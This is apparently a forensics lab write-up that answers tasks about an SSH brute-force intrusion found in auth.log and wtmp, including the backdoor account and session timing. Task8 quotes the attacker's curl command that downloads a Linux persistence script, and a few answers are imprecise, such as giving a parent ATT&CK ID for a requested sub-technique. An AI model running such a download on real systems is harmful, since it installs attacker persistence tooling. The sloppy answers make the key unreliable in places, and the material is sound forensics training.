Category: Linux Forensics, DFIR
This lab provides two files: auth.log and wtmp.
The focus of this lab is mainly on the knowledge of auth.log and wtmp files under Linux. It can increase understanding of the auth.log file, which is a commonly viewed log file in forensics.
The auth.log file is a log file used in Linux systems to record authentication-related events, especially on Debian-based distributions. It mainly records authentication events of the system, including successful and failed login attempts, user switching, sudo command usage, SSH connections, etc.
Introduction to the fields of auth.log:
- Timestamp: The date and time the log was generated.
- Hostname: The name of the Linux machine.
- Process Name: The name of the process.
- Process ID: The process ID identifier.
- User: The username involved in the authentication process.
- Authentication Status: Detailed description of whether the authentication attempt was successful or failed.
- IP Address: The IP address of the remote connection attempt.
- Message Content:
Aug 8 12:34:56 hostname sshd[12345]: Failed password for root from 192.168.1.100 port 54321 ssh2
WTMP File
The wtmp file can be viewed on macOS using the utmpdump tool. On a Linux server, you can use the last
command to view the wtmp log.
The output of utmpdump
contains multiple fields decoded from the binary format of the wtmp
file. Here is an introduction to each field:
- Type: This indicates the type of record, such as user login or logout, system startup or shutdown events.
- Process ID: The process identifier associated with the event.
- Line: The terminal line (tty or pts) on which the user logged in.
- Identifier: A short identifier associated with the line field.
- User: The username associated with the event.
- Host: The hostname or IP address of the system the user accessed, if applicable.
- Exit: The exit status of the session or process.
- Session: The session ID.
- Time: The timestamp of the event.
- Address: Additional address information, which may be an IP address in the case of remote logins.
Task1 Can we find the IP address used by the attacker during the brute-force attack by viewing the auth.log log?
cat auth.log | grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" -r xxx --color=auto | grep "Invalid user"
65.2.161.68
Task2 Through brute-force attacks, the attacker successfully infiltrated an account on the server. What is the username of this account?
root
Task3 Can you determine the specific time when the attacker personally logged into the server to execute their plan?
There is a time difference, subtract 8, 14:32:45 - 8:00:00 = 06:32:45
2024-03-06 06:32:45
Task4 SSH sessions are tracked when users log in and assigned a number for each session. In the scenario described in question 2, what number was assigned to the attacker's session after logging in with their account?
cat auth.log | grep "root"
37
Task5 In order to maintain long-term control over the server, the attacker created a new user account and assigned it a higher level of privileges. What is the name of this account?
cat auth.log | grep "Accept"
cyberjunkie
Task6 What is the sub-technique ID used for persistence in MITRE ATT&CK?
https://attack.mitre.org/techniques/T1136
Task7 Based on the previously confirmed login time and the session end time recorded in the authentication log file, can we calculate the duration of the attacker's initial SSH connection in seconds?
From 32.45 to 37:24
240+39
Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
Mar 6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.
Task8 The attacker logged into their backdoor account and used its higher privileges to download a script. What was the complete command executed with sudo?
/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh